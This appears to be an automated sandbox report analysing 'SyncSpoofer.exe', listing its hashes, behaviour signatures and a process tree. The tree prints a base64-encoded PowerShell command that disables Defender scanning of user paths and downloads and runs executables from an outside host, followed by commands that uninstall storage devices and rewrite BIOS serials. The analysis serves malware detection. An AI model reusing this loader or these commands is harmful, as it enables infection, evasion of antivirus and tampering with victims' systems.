Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    03/08/2024, 07:45

General

  • Target

    SyncSpoofer.exe

  • Size

    2.5MB

  • MD5

    4c23a05e5ee3cbf9f770a04c434faead

  • SHA1

    67bdadebdd222beae7097bbed9699aaf18282657

  • SHA256

    5ad39be48dbd64accc2e81e8bcb4f65325fc119f283713ca5aa677869398c580

  • SHA512

    ac46de9bb81356d35f4b4cc930d7c934ebc9ac1578d93291d15540c44588985ce8a1479cd790b4318595609e7d392938c1345256eb889cf071e5d0b8cbe0f232

  • SSDEEP

    49152:jLTbqRkki0qgd0fsexLxZak//s3RA+SW4+VbuLpG8AVTyyu75jNi7MOZTFL:HaoDgw7aTB4W4+VgG8QTyrFJ8rNB

Malware Config

Signatures

  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Detected Nirsoft tools 2 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 30 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Maps connected drives based on registry 3 TTPs 64 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 5 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 47 IoCs
  • Modifies registry class 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 16 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\SyncSpoofer.exe
    "C:\Users\Admin\AppData\Local\Temp\SyncSpoofer.exe"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2872
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbABoACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbQB2AHMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAZgBjAGoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBzAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBIAHAAcwByAFMAcABvAG8AZgAuAGUAeABlACcALAAgADwAIwBqAGMAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGIAbQBpACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAYgBpACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApACkAPAAjAHkAcgBjACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHMAcABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAGEAeQBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYQBjAGUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdgBjAG0AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAawB6AHIAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAG0ALwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwAsACAAPAAjAGUAdgBuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQBmAGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAawBpAHYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAGYAdAAuAGUAeABlACcAKQApADwAIwB6AHIAZQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AYwAvAFYAQwBfAHIAZQBkAGkAcwB0AHgANgA0AC4AZQB4AGUAJwAsACAAPAAjAHYAbgBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbABlAHAAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAawBkAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBDAF8AcgBlAGQAaQBzAHQAeAA2ADQALgBlAHgAZQAnACkAKQA8ACMAaABhAHQAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABxAHUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAZwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApADwAIwB4AHIAagAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGEAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZABrAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAPAAjAHcAeQB3ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHQAaQBlACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBhAGEAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwApADwAIwBkAGsAeQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBtAHcAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdgBrAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBDAF8AcgBlAGQAaQBzAHQAeAA2ADQALgBlAHgAZQAnACkAPAAjAHkAawB1ACMAPgA="
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1232
      • C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
        "C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of WriteProcessMemory
        PID:3668
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: H71O-00OP
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:364
          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
            C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: H71O-00OP
            5⤵
            • Executes dropped EXE
            PID:3752
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4360
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4912
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3828
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4936
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1496
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3496
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:592
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4244
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2688
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1016
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3040
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:516
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1088
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Drops file in Windows directory
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:796
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Drops file in Windows directory
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1924
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:636
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
          4⤵
            PID:988
            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 7229HP-TRGT26260AB
              5⤵
              • Executes dropped EXE
              PID:4004
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
            4⤵
              PID:2116
              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 27229HP-TRGT26260RV
                5⤵
                • Executes dropped EXE
                PID:4876
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
              4⤵
                PID:1964
                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 87229HP-TRGT26260SG
                  5⤵
                  • Executes dropped EXE
                  PID:1916
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                4⤵
                  PID:1280
                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                    5⤵
                    • Executes dropped EXE
                    PID:3872
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
                  4⤵
                    PID:3692
                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 57232HP-TRGT4240SL
                      5⤵
                      • Executes dropped EXE
                      PID:212
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
                    4⤵
                      PID:3752
                      • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 47232HP-TRGT4240FA
                        5⤵
                        • Executes dropped EXE
                        PID:1440
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
                      4⤵
                        PID:3440
                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 67232HP-TRGT4240FU
                          5⤵
                          • Executes dropped EXE
                          PID:4748
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                        4⤵
                          PID:2028
                          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 37232HP-TRGT4240DQ
                            5⤵
                            • Executes dropped EXE
                            PID:2828
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                          4⤵
                            PID:740
                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 77232HP-TRGT4240MST
                              5⤵
                              • Executes dropped EXE
                              PID:2596
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                            4⤵
                              PID:1364
                              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                5⤵
                                • Executes dropped EXE
                                PID:4332
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
                              4⤵
                                PID:2688
                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 7248HP-TRGT25214AB
                                  5⤵
                                  • Executes dropped EXE
                                  PID:3620
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
                                4⤵
                                  PID:504
                                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 27248HP-TRGT25214RV
                                    5⤵
                                    • Executes dropped EXE
                                    PID:1496
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
                                  4⤵
                                    PID:3344
                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 87248HP-TRGT25214SG
                                      5⤵
                                      • Executes dropped EXE
                                      PID:1964
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                    4⤵
                                      PID:4120
                                      • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                        5⤵
                                        • Executes dropped EXE
                                        PID:1868
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
                                      4⤵
                                        PID:1216
                                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 57248HP-TRGT25214SL
                                          5⤵
                                          • Executes dropped EXE
                                          PID:1280
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
                                        4⤵
                                          PID:3048
                                          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 47248HP-TRGT25214FA
                                            5⤵
                                            • Executes dropped EXE
                                            PID:212
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
                                          4⤵
                                            PID:2064
                                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 67248HP-TRGT25214FU
                                              5⤵
                                              • Executes dropped EXE
                                              PID:1584
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                                            4⤵
                                              PID:64
                                              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 37248HP-TRGT25214DQ
                                                5⤵
                                                • Executes dropped EXE
                                                PID:1440
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                                              4⤵
                                                PID:2080
                                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 77248HP-TRGT25214MST
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:3484
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                4⤵
                                                  PID:3192
                                                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:4748
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
                                                  4⤵
                                                    PID:2672
                                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 7268HP-TRGT24169AB
                                                      5⤵
                                                      • Executes dropped EXE
                                                      PID:1216
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
                                                    4⤵
                                                      PID:4708
                                                      • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 27268HP-TRGT24169RV
                                                        5⤵
                                                        • Executes dropped EXE
                                                        PID:4820
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
                                                      4⤵
                                                        PID:4432
                                                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 87268HP-TRGT24169SG
                                                          5⤵
                                                          • Executes dropped EXE
                                                          PID:4736
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                                        4⤵
                                                          PID:1676
                                                          • C:\Windows\System32\Conhost.exe
                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            5⤵
                                                              PID:4004
                                                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:212
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
                                                            4⤵
                                                              PID:3240
                                                              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 57268HP-TRGT24169SL
                                                                5⤵
                                                                • Executes dropped EXE
                                                                PID:424
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
                                                              4⤵
                                                                PID:3360
                                                                • C:\Windows\System32\Conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  5⤵
                                                                    PID:3620
                                                                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 47268HP-TRGT24169FA
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    PID:2752
